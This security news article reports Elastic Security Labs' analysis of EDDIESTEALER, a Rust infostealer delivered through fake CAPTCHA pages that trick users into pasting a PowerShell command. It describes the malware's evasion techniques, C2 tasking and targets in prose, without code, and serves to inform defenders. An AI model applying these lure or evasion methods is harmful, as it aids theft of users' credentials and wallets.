A new Rust-based infostealer dubbed EDDIESTEALER is being spread via the popular ClickFix social engineering technique, which uses fake CAPTCHAs to fool users, Elastic Security Labs reported Thursday.EDDIESTEALER evades analysis through the use of various obfuscation techniques including XOR string encryption, stripping of function symbols, and a custom API lookup mechanism.The infostealer retrieves a task list dynamically from the attacker’s command-and-control (C2) server, allowing it to adapt its behavior over time.The attack begins with fake Google reCAPTCHA prompts planted on compromised websites. The scam pages instruct the user to copy and paste a PowerShell command into their Windows terminal to prove they are not a robot.This command retrieves and executes a file called gverify.js, which is saved to the victim’s downloads folder, and gverify.js retrieves the final EDDIESTEALER payload, which is also saved to the downloads folder with a pseudorandom 12-character file name, Elastic explained.Written in Rust, EDDIESTEALER attempts to avoid static analysis by stripping its function symbols and encrypting most of its strings using a XOR cipher.The researchers noted that the open-source tool rustbinsign can help restore the stripped symbols, while the XOR-encrypted strings could be reverse engineered using tools like Binary Ninja’s User-Informed Data Flow (UIDF) feature or the open-source Unicorn CPU emulator paired with a scriptable binary analysis tool.Additional evasion techniques include a basic anti-sandbox check for physical memory greater than 4 GB, a self-deletion mechanism via NTFS Alternate Data Streams (ADS) renaming and a custom Windows API lookup method that dynamically resolves modules using a LoadLibrary wrapper, further avoiding static analysis of its API interactions.Rather than following a hardcoded task list, EDDIESTEALER retrieves configuration data from the attacker’s C2 server, which tells the malware which programs and applications to target for its information stealing activities.Elastic has observed the stealer targeting a range of cryptocurrency wallets, browsers, password managers and file transfer protocol (FTP) clients, as well as the Telegram messaging app. The dynamic C2 tasking method allows the attacker to update the list of targeted apps as needed, providing greater flexibility and adaptability. The EDDIESTEALER campaign highlights the continued popularity of the ClickFix social engineering method, as well as the increasing use of the Rust programming language my malware developers.“A seemingly simple infostealer written in Rust often requires more dedicated analysis efforts compared to its C/C++ counterpart, owing to factors such as zero-cost abstractions, Rust’s type system, compiler optimizations, and inherent difficulties in analyzing memory-safe binaries,” the Elastic researchers wrote.
